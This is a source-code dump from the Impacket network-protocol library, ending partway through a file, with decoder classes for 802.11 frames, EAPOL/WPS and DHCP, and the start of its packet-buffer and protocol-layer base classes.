self.ctrl_rts_decoder.decode(d.body_string)\n elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_CONTROL_POWERSAVE_POLL:\n self.ctrl_pspoll_decoder = Dot11ControlFramePSPollDecoder()\n packet = self.ctrl_pspoll_decoder.decode(d.body_string)\n elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_CONTROL_CF_END:\n self.ctrl_cfend_decoder = Dot11ControlFrameCFEndDecoder()\n packet = self.ctrl_cfend_decoder.decode(d.body_string)\n elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_CONTROL_CF_END_CF_ACK:\n self.ctrl_cfendcfack_decoder = Dot11ControlFrameCFEndCFACKDecoder()\n packet = self.ctrl_cfendcfack_decoder.decode(d.body_string)\n else:\n data_decoder = DataDecoder()\n packet = data_decoder.decode(d.body_string)\n \n d.contains(packet)\n return d\n\nclass Dot11ControlFrameCTSDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n \n def decode(self, aBuffer):\n p = dot11.Dot11ControlFrameCTS(aBuffer)\n self.set_decoded_protocol(p)\n return p\n\nclass Dot11ControlFrameACKDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n \n def decode(self, aBuffer):\n p = dot11.Dot11ControlFrameACK(aBuffer)\n self.set_decoded_protocol(p)\n return p\n\nclass Dot11ControlFrameRTSDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n \n def decode(self, aBuffer):\n p = dot11.Dot11ControlFrameRTS(aBuffer)\n self.set_decoded_protocol(p)\n return p\n\nclass Dot11ControlFramePSPollDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n \n def decode(self, aBuffer):\n p = dot11.Dot11ControlFramePSPoll(aBuffer)\n self.set_decoded_protocol(p)\n return p\n\nclass Dot11ControlFrameCFEndDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n \n def decode(self, aBuffer):\n p = dot11.Dot11ControlFrameCFEnd(aBuffer)\n self.set_decoded_protocol(p)\n return p\nclass Dot11ControlFrameCFEndCFACKDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n \n def decode(self, aBuffer):\n p = dot11.Dot11ControlFrameCFEndCFACK(aBuffer)\n self.set_decoded_protocol(p)\n return p\n\nclass Dot11DataDecoder(BaseDot11Decoder):\n def __init__(self, key_manager):\n BaseDot11Decoder.__init__(self, key_manager)\n \n def set_dot11_hdr(self, dot11_obj):\n self.dot11 = dot11_obj\n \n def decode(self, aBuffer):\n if self.dot11.get_fromDS() and self.dot11.get_toDS():\n if self.dot11.is_QoS_frame():\n p = dot11.Dot11DataAddr4QoSFrame(aBuffer)\n else:\n p = dot11.Dot11DataAddr4Frame(aBuffer)\n elif self.dot11.is_QoS_frame():\n p = dot11.Dot11DataQoSFrame(aBuffer)\n else:\n p = dot11.Dot11DataFrame(aBuffer)\n self.set_decoded_protocol( p )\n \n if not self.dot11.get_protectedFrame():\n self.llc_decoder = LLCDecoder()\n packet = self.llc_decoder.decode(p.body_string)\n else:\n if not self.dot11.get_fromDS() and self.dot11.get_toDS():\n bssid = p.get_address1()\n elif self.dot11.get_fromDS() and not self.dot11.get_toDS():\n bssid = p.get_address2()\n elif not self.dot11.get_fromDS() and not self.dot11.get_toDS():\n bssid = p.get_address3()\n else:\n # WDS, this is the RA\n bssid = p.get_address1()\n \n wep_decoder = Dot11WEPDecoder(self.key_manager)\n wep_decoder.set_bssid(bssid)\n packet = wep_decoder.decode(p.body_string)\n if packet is None:\n wpa_decoder = Dot11WPADecoder()\n packet = wpa_decoder.decode(p.body_string)\n if packet is None:\n wpa2_decoder = Dot11WPA2Decoder()\n packet = wpa2_decoder.decode(p.body_string)\n if packet is None:\n data_decoder = DataDecoder()\n packet = data_decoder.decode(p.body_string)\n \n p.contains(packet)\n return p\n \nclass Dot11WEPDecoder(BaseDot11Decoder):\n def __init__(self, key_manager):\n BaseDot11Decoder.__init__(self, key_manager)\n self.bssid = None\n \n def set_bssid(self, bssid):\n self.bssid = bssid\n \n def decode(self, aBuffer):\n wep = dot11.Dot11WEP(aBuffer)\n self.set_decoded_protocol( wep )\n \n if wep.is_WEP() is False:\n return None\n \n key = self.find_key(self.bssid)\n if key:\n decoded_string=wep.get_decrypted_data(key)\n \n wep_data = Dot11WEPDataDecoder()\n packet = wep_data.decode(decoded_string)\n else:\n data_decoder = DataDecoder()\n packet = data_decoder.decode(wep.body_string)\n \n wep.contains(packet)\n \n return wep\n\nclass Dot11WEPDataDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n\n def decode(self, aBuffer):\n wep_data = dot11.Dot11WEPData(aBuffer)\n\n if not wep_data.check_icv():\n # TODO: Do something when the icv is not correct\n pass\n\n self.set_decoded_protocol( wep_data )\n\n llc_decoder = LLCDecoder()\n packet = llc_decoder.decode(wep_data.body_string)\n\n wep_data.contains(packet)\n\n return wep_data\n\n\nclass Dot11WPADecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n\n def decode(self, aBuffer, key=None):\n wpa = dot11.Dot11WPA(aBuffer)\n self.set_decoded_protocol( wpa )\n\n if wpa.is_WPA() is False:\n return None\n\n if key:\n decoded_string=wpa.get_decrypted_data()\n\n wpa_data = Dot11WPADataDecoder()\n packet = wpa_data.decode(decoded_string)\n else:\n data_decoder = DataDecoder()\n packet = data_decoder.decode(wpa.body_string)\n\n wpa.contains(packet)\n\n return wpa\n\nclass Dot11WPADataDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n\n def decode(self, aBuffer):\n wpa_data = dot11.Dot11WPAData(aBuffer)\n self.set_decoded_protocol( wpa_data )\n\n llc_decoder = LLCDecoder()\n packet = self.llc_decoder.decode(wpa_data.body_string)\n\n wpa_data.contains(packet)\n\n return wpa_data\n\nclass Dot11WPA2Decoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n\n def decode(self, aBuffer, key=None):\n wpa2 = dot11.Dot11WPA2(aBuffer)\n self.set_decoded_protocol( wpa2 )\n\n if wpa2.is_WPA2() is False:\n return None\n\n if key:\n decoded_string=wpa2.get_decrypted_data()\n\n wpa2_data = Dot11WPA2DataDecoder()\n packet = wpa2_data.decode(decoded_string)\n else:\n data_decoder = DataDecoder()\n packet = data_decoder.decode(wpa2.body_string)\n\n wpa2.contains(packet)\n\n return wpa2\n\nclass Dot11WPA2DataDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n\n def decode(self, aBuffer):\n wpa2_data = dot11.Dot11WPA2Data(aBuffer)\n self.set_decoded_protocol( wpa2_data )\n\n llc_decoder = LLCDecoder()\n packet = self.llc_decoder.decode(wpa2_data.body_string)\n\n wpa2_data.contains(packet)\n\n return wpa2_data\n\nclass LLCDecoder(Decoder):\n def __init__(self):\n pass\n\n def decode(self, aBuffer):\n d = dot11.LLC(aBuffer)\n self.set_decoded_protocol( d )\n\n if d.get_DSAP()==dot11.SAPTypes.SNAP:\n if d.get_SSAP()==dot11.SAPTypes.SNAP:\n if d.get_control()==dot11.LLC.DLC_UNNUMBERED_FRAMES:\n snap_decoder = SNAPDecoder()\n packet = snap_decoder.decode(d.body_string)\n d.contains(packet)\n return d\n\n # Only SNAP is implemented\n data_decoder = DataDecoder()\n packet = data_decoder.decode(d.body_string)\n d.contains(packet)\n return d\n\nclass SNAPDecoder(Decoder):\n def __init__(self):\n pass\n\n def decode(self, aBuffer):\n s = dot11.SNAP(aBuffer)\n self.set_decoded_protocol( s )\n if s.get_OUI()==CDP.OUI and s.get_protoID()==CDP.Type:\n dec = CDPDecoder()\n packet = dec.decode(s.body_string)\n elif s.get_OUI()!=0x000000:\n # We don't know how to handle other than OUI=0x000000 (EtherType)\n self.data_decoder = DataDecoder()\n packet = self.data_decoder.decode(s.body_string)\n elif s.get_protoID() == ImpactPacket.IP.ethertype:\n self.ip_decoder = IPDecoder()\n packet = self.ip_decoder.decode(s.body_string)\n elif s.get_protoID() == ImpactPacket.ARP.ethertype:\n self.arp_decoder = ARPDecoder()\n packet = self.arp_decoder.decode(s.body_string)\n elif s.get_protoID() == eap.DOT1X_AUTHENTICATION:\n self.eapol_decoder = EAPOLDecoder()\n packet = self.eapol_decoder.decode(s.body_string)\n else:\n self.data_decoder = DataDecoder()\n packet = self.data_decoder.decode(s.body_string)\n\n s.contains(packet)\n return s\n\nclass CDPDecoder(Decoder):\n\n def __init__(self):\n pass\n\n def decode(self, aBuffer):\n s = CDP(aBuffer)\n self.set_decoded_protocol( s )\n return s\n\nclass Dot11ManagementDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n self.subtype = None\n\n def set_subtype(self, subtype):\n self.subtype=subtype\n\n def decode(self, aBuffer):\n p = dot11.Dot11ManagementFrame(aBuffer)\n self.set_decoded_protocol( p )\n\n if self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_BEACON:\n self.mgt_beacon_decoder = Dot11ManagementBeaconDecoder()\n packet = self.mgt_beacon_decoder.decode(p.body_string)\n elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_PROBE_REQUEST:\n self.mgt_probe_request_decoder = Dot11ManagementProbeRequestDecoder()\n packet = self.mgt_probe_request_decoder.decode(p.body_string)\n elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_PROBE_RESPONSE:\n self.mgt_probe_response_decoder = Dot11ManagementProbeResponseDecoder()\n packet = self.mgt_probe_response_decoder.decode(p.body_string)\n elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_DEAUTHENTICATION:\n self.mgt_deauthentication_decoder = Dot11ManagementDeauthenticationDecoder()\n packet = self.mgt_deauthentication_decoder.decode(p.body_string)\n elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_AUTHENTICATION:\n self.mgt_Authentication_decoder = Dot11ManagementAuthenticationDecoder()\n packet = self.mgt_Authentication_decoder.decode(p.body_string)\n elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_DISASSOCIATION:\n self.mgt_disassociation_decoder = Dot11ManagementDisassociationDecoder()\n packet = self.mgt_disassociation_decoder.decode(p.body_string)\n elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_ASSOCIATION_REQUEST:\n self.mgt_association_request_decoder = Dot11ManagementAssociationRequestDecoder()\n packet = self.mgt_association_request_decoder.decode(p.body_string)\n elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_ASSOCIATION_RESPONSE:\n self.mgt_association_response_decoder = Dot11ManagementAssociationResponseDecoder()\n packet = self.mgt_association_response_decoder.decode(p.body_string)\n elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_REASSOCIATION_REQUEST:\n self.mgt_reassociation_request_decoder = Dot11ManagementReassociationRequestDecoder()\n packet = self.mgt_reassociation_request_decoder.decode(p.body_string)\n elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_REASSOCIATION_RESPONSE:\n self.mgt_reassociation_response_decoder = Dot11ManagementReassociationResponseDecoder()\n packet = self.mgt_reassociation_response_decoder.decode(p.body_string)\n else:\n data_decoder = DataDecoder()\n packet = data_decoder.decode(p.body_string)\n\n p.contains(packet)\n return p\n\nclass Dot11ManagementBeaconDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n\n def decode(self, aBuffer):\n p = dot11.Dot11ManagementBeacon(aBuffer)\n self.set_decoded_protocol( p )\n\n return p\n\nclass Dot11ManagementProbeRequestDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n\n def decode(self, aBuffer):\n p = dot11.Dot11ManagementProbeRequest(aBuffer)\n self.set_decoded_protocol( p )\n\n return p\n\nclass Dot11ManagementProbeResponseDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n\n def decode(self, aBuffer):\n p = dot11.Dot11ManagementProbeResponse(aBuffer)\n self.set_decoded_protocol( p )\n\n return p\n\nclass Dot11ManagementDeauthenticationDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n\n def decode(self, aBuffer):\n p = dot11.Dot11ManagementDeauthentication(aBuffer)\n self.set_decoded_protocol( p )\n\n return p\n\nclass Dot11ManagementAuthenticationDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n\n def decode(self, aBuffer):\n p = dot11.Dot11ManagementAuthentication(aBuffer)\n self.set_decoded_protocol(p)\n\n return p\n\nclass Dot11ManagementDisassociationDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n\n def decode(self, aBuffer):\n p = dot11.Dot11ManagementDisassociation(aBuffer)\n self.set_decoded_protocol(p)\n\n return p\n\nclass Dot11ManagementAssociationRequestDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n\n def decode(self, aBuffer):\n p = dot11.Dot11ManagementAssociationRequest(aBuffer)\n self.set_decoded_protocol(p)\n\n return p\n\nclass Dot11ManagementAssociationResponseDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n\n def decode(self, aBuffer):\n p = dot11.Dot11ManagementAssociationResponse(aBuffer)\n self.set_decoded_protocol(p)\n\n return p\n\nclass Dot11ManagementReassociationRequestDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n\n def decode(self, aBuffer):\n p = dot11.Dot11ManagementReassociationRequest(aBuffer)\n self.set_decoded_protocol(p)\n\n return p\n\nclass Dot11ManagementReassociationResponseDecoder(BaseDot11Decoder):\n def __init__(self):\n BaseDot11Decoder.__init__(self)\n\n def decode(self, aBuffer):\n p = dot11.Dot11ManagementReassociationResponse(aBuffer)\n self.set_decoded_protocol(p)\n\n return p\n\nclass BaseDecoder(Decoder):\n\n def decode(self, buff):\n\n packet = self.klass(buff)\n self.set_decoded_protocol(packet)\n cd = self.child_decoders.get(self.child_key(packet), DataDecoder())\n packet.contains(cd.decode(packet.get_body_as_string()))\n return packet\n\nclass SimpleConfigDecoder(BaseDecoder):\n\n child_decoders = {}\n klass = wps.SimpleConfig\n child_key = lambda s,p: None\n\n def decode(self, buff):\n sc = BaseDecoder.decode(self, buff)\n ary = array.array('B', sc.child().get_packet())\n sc.unlink_child()\n tlv = wps.SimpleConfig.build_tlv_container()\n tlv.from_ary(ary)\n sc.contains(tlv)\n\n return sc\n\nclass EAPExpandedDecoder(BaseDecoder):\n child_decoders = {\n (eap.EAPExpanded.WFA_SMI, eap.EAPExpanded.SIMPLE_CONFIG): SimpleConfigDecoder(),\n }\n klass = eap.EAPExpanded\n child_key = lambda s,p: (p.get_vendor_id(), p.get_vendor_type())\n\nclass EAPRDecoder(BaseDecoder):\n child_decoders = {\n eap.EAPR.EXPANDED:EAPExpandedDecoder()\n }\n klass = eap.EAPR\n child_key = lambda s, p: p.get_type()\n\nclass EAPDecoder(BaseDecoder):\n child_decoders = {\n eap.EAP.REQUEST: EAPRDecoder(),\n eap.EAP.RESPONSE: EAPRDecoder(),\n }\n klass = eap.EAP\n child_key = lambda s, p: p.get_code()\n\nclass EAPOLDecoder(BaseDecoder):\n child_decoders = {\n eap.EAPOL.EAP_PACKET: EAPDecoder()\n }\n klass = eap.EAPOL\n child_key = lambda s, p: p.get_packet_type()\n\nclass BootpDecoder(Decoder):\n def __init__(self):\n pass\n\n def decode(self, aBuffer):\n d = dhcp.BootpPacket(aBuffer)\n self.set_decoded_protocol( d )\n off = len(d.getData())\n if dhcp.DhcpPacket(aBuffer[off:])['cookie'] == dhcp.DhcpPacket.MAGIC_NUMBER:\n self.data_decoder = DHCPDecoder()\n packet = self.data_decoder.decode(aBuffer[off:])\n d.contains(packet)\n return d\n\nclass DHCPDecoder(Decoder):\n def __init__(self):\n pass\n\n def decode(self, aBuffer):\n d = dhcp.DhcpPacket(aBuffer)\n self.set_decoded_protocol( d )\n return d\n" }, { "path": "impacket/ImpactPacket.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Network packet codecs basic building blocks.\n# Low-level packet codecs for various Internet protocols.\n#\n# Author:\n# Javier Burroni (javier)\n# Bruce Leidl (brl)\n# Javier Kohen (jkohen)\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport array\nimport struct\nimport socket\nimport string\nimport sys\nfrom binascii import hexlify\nfrom functools import reduce\n\n# Alias function for compatibility with both Python <3.2 `tostring` and `fromstring` methods, and\n# Python >=3.2 `tobytes` and `tostring`\nif sys.version_info[0] >= 3 and sys.version_info[1] >= 2:\n array_tobytes = lambda array_object: array_object.tobytes()\n array_frombytes = lambda array_object, bytes: array_object.frombytes(bytes)\nelse:\n array_tobytes = lambda array_object: array_object.tostring()\n array_frombytes = lambda array_object, bytes: array_object.fromstring(bytes)\n\n\n\"\"\"Classes to build network packets programmatically.\n\nEach protocol layer is represented by an object, and these objects are\nhierarchically structured to form a packet. This list is traversable\nin both directions: from parent to child and vice versa.\n\nAll objects can be turned back into a raw buffer ready to be sent over\nthe wire (see method get_packet).\n\"\"\"\n\nclass ImpactPacketException(Exception):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\nclass PacketBuffer(object):\n \"\"\"Implement the basic operations utilized to operate on a\n packet's raw buffer. All the packet classes derive from this one.\n\n The byte, word, long and ip_address getters and setters accept\n negative indexes, having these the a similar effect as in a\n regular Python sequence slice.\n \"\"\"\n\n def __init__(self, length = None):\n \"If 'length' is specified the buffer is created with an initial size\"\n if length:\n self.__bytes = array.array('B', b'\\0' * length)\n else:\n self.__bytes = array.array('B')\n\n def set_bytes_from_string(self, data):\n \"Sets the value of the packet buffer from the string 'data'\"\n self.__bytes = array.array('B', data)\n\n def get_buffer_as_string(self):\n \"Returns the packet buffer as a string object\"\n return array_tobytes(self.__bytes)\n\n def get_bytes(self):\n \"Returns the packet buffer as an array\"\n return self.__bytes\n\n def set_bytes(self, bytes):\n \"Set the packet buffer from an array\"\n # Make a copy to be safe\n self.__bytes = array.array('B', bytes.tolist())\n\n def set_byte(self, index, value):\n \"Set byte at 'index' to 'value'\"\n index = self.__validate_index(index, 1)\n self.__bytes[index] = value\n\n def get_byte(self, index):\n \"Return byte at 'index'\"\n index = self.__validate_index(index, 1)\n return self.__bytes[index]\n\n def set_word(self, index, value, order = '!'):\n \"Set 2-byte word at 'index' to 'value'. See struct module's documentation to understand the meaning of 'order'.\"\n index = self.__validate_index(index, 2)\n ary = array.array(\"B\", struct.pack(order + 'H', value))\n if -2 == index:\n self.__bytes[index:] = ary\n else:\n self.__bytes[index:index+2] = ary\n\n def get_word(self, index, order = '!'):\n \"Return 2-byte word at 'index'. See struct module's documentation to understand the meaning of 'order'.\"\n index = self.__validate_index(index, 2)\n if -2 == index:\n bytes = self.__bytes[index:]\n else:\n bytes = self.__bytes[index:index+2]\n (value,) = struct.unpack(order + 'H', array_tobytes(bytes))\n return value\n\n def set_long(self, index, value, order = '!'):\n \"Set 4-byte 'value' at 'index'. See struct module's documentation to understand the meaning of 'order'.\"\n index = self.__validate_index(index, 4)\n ary = array.array(\"B\", struct.pack(order + 'L', value))\n if -4 == index:\n self.__bytes[index:] = ary\n else:\n self.__bytes[index:index+4] = ary\n\n def get_long(self, index, order = '!'):\n \"Return 4-byte value at 'index'. See struct module's documentation to understand the meaning of 'order'.\"\n index = self.__validate_index(index, 4)\n if -4 == index:\n bytes = self.__bytes[index:]\n else:\n bytes = self.__bytes[index:index+4]\n (value,) = struct.unpack(order + 'L', array_tobytes(bytes))\n return value\n\n def set_long_long(self, index, value, order = '!'):\n \"Set 8-byte 'value' at 'index'. See struct module's documentation to understand the meaning of 'order'.\"\n index = self.__validate_index(index, 8)\n ary = array.array(\"B\", struct.pack(order + 'Q', value))\n if -8 == index:\n self.__bytes[index:] = ary\n else:\n self.__bytes[index:index+8] = ary\n\n def get_long_long(self, index, order = '!'):\n \"Return 8-byte value at 'index'. See struct module's documentation to understand the meaning of 'order'.\"\n index = self.__validate_index(index, 8)\n if -8 == index:\n bytes = self.__bytes[index:]\n else:\n bytes = self.__bytes[index:index+8]\n (value,) = struct.unpack(order + 'Q', array_tobytes(bytes))\n return value\n\n\n def get_ip_address(self, index):\n \"Return 4-byte value at 'index' as an IP string\"\n index = self.__validate_index(index, 4)\n if -4 == index:\n bytes = self.__bytes[index:]\n else:\n bytes = self.__bytes[index:index+4]\n return socket.inet_ntoa(array_tobytes(bytes))\n\n def set_ip_address(self, index, ip_string):\n \"Set 4-byte value at 'index' from 'ip_string'\"\n index = self.__validate_index(index, 4)\n raw = socket.inet_aton(ip_string)\n (b1,b2,b3,b4) = struct.unpack(\"BBBB\", raw)\n self.set_byte(index, b1)\n self.set_byte(index + 1, b2)\n self.set_byte(index + 2, b3)\n self.set_byte(index + 3, b4)\n\n def set_checksum_from_data(self, index, data):\n \"Set 16-bit checksum at 'index' by calculating checksum of 'data'\"\n self.set_word(index, self.compute_checksum(data))\n\n def compute_checksum(self, anArray):\n \"Return the one's complement of the one's complement sum of all the 16-bit words in 'anArray'\"\n nleft = len(anArray)\n sum = 0\n pos = 0\n while nleft > 1:\n sum = anArray[pos] * 256 + (anArray[pos + 1] + sum)\n pos = pos + 2\n nleft = nleft - 2\n if nleft == 1:\n sum = sum + anArray[pos] * 256\n return self.normalize_checksum(sum)\n\n def normalize_checksum(self, aValue):\n sum = aValue\n sum = (sum >> 16) + (sum & 0xFFFF)\n sum += (sum >> 16)\n sum = (~sum & 0xFFFF)\n return sum\n\n def __validate_index(self, index, size):\n \"\"\"This method performs two tasks: to allocate enough space to\n fit the elements at positions index through index+size, and to\n adjust negative indexes to their absolute equivalent.\n \"\"\"\n\n orig_index = index\n\n curlen = len(self.__bytes)\n if index < 0:\n index = curlen + index\n\n diff = index + size - curlen\n if diff > 0:\n array_frombytes(self.__bytes, b'\\0' * diff)\n if orig_index < 0:\n orig_index -= diff\n\n return orig_index\n\nclass ProtocolLayer():\n \"Protocol Layer Manager for insertion and removal of protocol layers.\"\n\n __child = None\n __parent = None\n \n def contains(self, aHeader):\n \"Set 'aHeader' as the child of this protocol layer\"\n self.__child = aHeader\n aHeader.set_parent(self)\n\n def set_parent(self, my_parent):\n \"Set the header 'my_parent' as the parent of this protocol layer\"\n self.__parent = my_parent\n\n def child(self):\n \"Return the child of this protocol layer\"\n return self.__child\n\n def parent(self):\n \"Return the parent of this protocol layer\"\n return self.__parent\n \n def unlink_child(self):\n \"Break the hierarchy parent/child child/parent\"\n if self.__child:\n self.__child.set_parent(None)\n self.__child = None \n\nclass ProtocolPacket(ProtocolLayer):\n __HEADER_SIZE = 0\n __BODY_SIZE = 0\n __TAIL_SIZE = 0\n \n __header = None\n __body = None\n __tail = None\n\n def __init__(self, header_size, tail_size):\n self.__HEADER_SIZE = header_size\n self.__TAIL_SIZE = tail_size\n self.__header=PacketBuffer(self.__HEADER_SIZE)\n self.__body=PacketBuffer()\n self.__tail=PacketBuffer(self.__TAIL_SIZE)\n \n def __update_body_from_child(self):\n # Update child raw packet in my body\n if self.child():\n body=self.child().get_packet()\n self.__BODY_SIZE=len(body)\n self.__body.set_bytes_from_string(body)\n \n def __get_header(self):\n return self.__header\n \n header = property(__get_header)\n\n def __get_body(self):\n self.__update_body_from_child()\n return self.__body\n \n body = property(__get_body)\n \n def __get_tail(self):\n return self.__tail\n \n tail = property(__get_tail)\n\n def get_header_size(self):\n \"Return frame header size\"\n return self.__HEADER_SIZE\n \n def get_tail_size(self):\n \"Return frame tail size\"\n return self.__TAIL_SIZE\n \n def get_body_size(self):\n \"Return frame body size\"\n self.__update_body_from_child()\n return self.__BODY_SIZE\n\n def get_size(self):\n \"Return frame total size\"\n return self.get_header_size()+self.get_body_size()+self.get_tail_size()\n \n def load_header(self, aBuffer):\n self.__HEADER_SIZE=len(aBuffer)\n self.__header.set_bytes_from_string(aBuffer)\n \n def load_body(self, aBuffer):\n \"Load the packet body from string. \"\\\n \"WARNING: Using this function will break the hierarchy of preceding protocol layer\"\n self.unlink_child()\n self.__BODY_SIZE=len(aBuffer)\n self.__body.set_bytes_from_string(aBuffer)\n \n def load_tail(self, aBuffer):\n self.__TAIL_SIZE=len(aBuffer)\n self.__tail.set_bytes_from_string(aBuffer)\n \n def __extract_header(self, aBuffer):\n self.load_header(aBuffer[:self.__HEADER_SIZE])\n \n def __extract_body(self, aBuffer):\n if self.__TAIL_SIZE<=0:\n end=None\n else:\n end=-self.__TAIL_SIZE\n self.__BODY_SIZE=len(aBuffer[self.__HEADER_SIZE:end])\n self.__body.set_bytes_from_string(aBuffer[self.__HEADER_SIZE:end])\n \n def __extract_tail(self, aBuffer):\n if self.__TAIL_SIZE<=0:\n # leave the array empty\n return\n else:\n start=-self.__TAIL_SIZE\n self.__tail.set_bytes_from_string(aBuffer[start:])\n\n def load_packet(self, aBuffer):\n \"Load the whole packet from a string\" \\\n \"WARNING: Using this function will break the hierarchy of preceding protocol layer\"\n self.unlink_child()\n \n self.__extract_header(aBuffer)\n self.__extract_body(aBuffer)\n self.__extract_tail(aBuffer)\n \n def get_header_as_string(self):\n return self.__header.get_buffer_as_string()\n \n def get_body_as_string(self):\n self.__update_body_from_child()\n return self.__body.get_buffer_as_string()\n body_string = property(get_body_as_string)\n \n def get_tail_as_string(self):\n return self.__tail.get_buffer_as_string()\n tail_string = property(get_tail_as_string)\n \n def get_packet(self):\n self.__update_body_from_child()\n \n ret = b''\n \n header = self.get_header_as_string()\n if header:\n ret += header\n\n body = self.get_body_as_string()\n if body:\n ret += body\n \n tail = self.get_tail_as_string() \n if tail:\n ret += tail\n \n return ret\n\nclass Header(PacketBuffer,ProtocolLayer):\n \"This is the base class from which all protocol definitions extend.\"\n\n packet_printable = [c for c in string.printable if c not in string.whitespace] + [' ']\n\n ethertype = None\n protocol = None\n def __init__(self, length = None):\n PacketBuffer.__init__(self, length)\n self.auto_checksum = 1\n\n def get_data_as_string(self):\n \"Returns all data from children of this header as string\"\n\n if self.child():\n return self.child().get_packet()\n else:\n return None\n\n def get_packet(self):\n \"\"\"Returns the raw representation of this packet and its\n children as a string. The output from this method is a packet\n ready to be transmitted over the wire.\n \"\"\"\n self.calculate_checksum()\n\n data = self.get_data_as_string()\n if data:\n return self.get_buffer_as_string() + data\n else:\n return self.get_buffer_as_string()\n\n def get_size(self):\n \"Return the size of this header and all of it's children\"\n tmp_value = self.get_header_size()\n if self.child():\n tmp_value = tmp_value + self.child().get_size()\n return tmp_value\n\n def calculate_checksum(self):\n \"Calculate and set the checksum for this header\"\n pass\n\n def get_pseudo_header(self):\n \"Pseudo headers can be used to limit over what content will the checksums be calculated.\"\n # default implementation returns empty array\n return array.array('B')\n\n def load_header(self, aBuffer):\n \"Properly set the state of this instance to reflect that of the raw packet passed as argument.\"\n self.set_bytes_from_string(aBuffer)\n hdr_len = self.get_header_size()\n if(len(aBuffer) < hdr_len): #we must do something like this\n diff = hdr_len - len(aBuffer)\n for i in range(0, diff):\n aBuffer += b'\\x00'\n self.set_bytes_from_string(aBuffer[:hdr_len])\n\n def get_header_size(self):\n \"Return the size of this header, that is, not counting neither the size of the children nor of the parents.\"\n raise RuntimeError(\"Method %s.get_header_size must be overridden.\" % self.__class__)\n\n def list_as_hex(self, aList):\n if len(aList):\n ltmp = []\n line = []\n count = 0\n for byte in aList:\n if not (count % 2):\n if (count % 16):\n ltmp.append(' ')\n else:\n ltmp.append(' '*4)\n ltmp.append(''.join(line))\n ltmp.append('\\n')\n line = []\n if chr(byte) in Header.packet_printable:\n line.append(chr(byte))\n else:\n line.append('.')\n ltmp.append('%.2x' % byte)\n count += 1\n if (count%16):\n left = 16 - (count%16)\n ltmp.append(' ' * (4+(left // 2) + (left*2)))\n ltmp.append(''.join(line))\n ltmp.append('\\n')\n return ltmp\n else:\n return []\n\n def __str__(self):\n ltmp = self.list_as_hex(self.get_bytes().tolist())\n\n if self.child():\n ltmp.append(['\\n', str(self.child())])\n\n if len(ltmp)>0:\n return ''.join(ltmp)\n else:\n return ''\n\n\n\nclass Data(Header):\n \"\"\"This packet type can hold raw data. It's normally employed to\n hold a packet's innermost layer's contents in those cases for\n which the protocol details are unknown, and there's a copy of a\n valid packet available.\n\n For instance, if all that's known about a certain protocol is that\n a UDP packet with its contents set to \"HELLO\" initiate a new\n session, creating such packet is as simple as in the following code\n fragment:\n packet = UDP()\n packet.contains('HELLO')\n \"\"\"\n\n def __init__(self, aBuffer = None):\n Header.__init__(self)\n if aBuffer:\n self.set_data(aBuffer)\n\n def set_data(self, data):\n self.set_bytes_from_string(data)\n\n def get_size(self):\n return len(self.get_bytes())\n\n\nclass EthernetTag(PacketBuffer):\n \"\"\"Represents a VLAN header specified in IEEE 802.1Q and 802.1ad.\n Provides methods for convenient manipulation with header fields.\"\"\"\n\n def __init__(self, value=0x81000000):\n PacketBuffer.__init__(self, 4)\n self.set_long(0, value)\n\n def get_tpid(self):\n \"\"\"Returns Tag Protocol Identifier\"\"\"\n return self.get_word(0)\n\n def set_tpid(self, value):\n \"\"\"Sets Tag Protocol Identifier\"\"\"\n return self.set_word(0, value)\n\n def get_pcp(self):\n \"\"\"Returns Priority Code Point\"\"\"\n return (self.get_byte(2) & 0xE0) 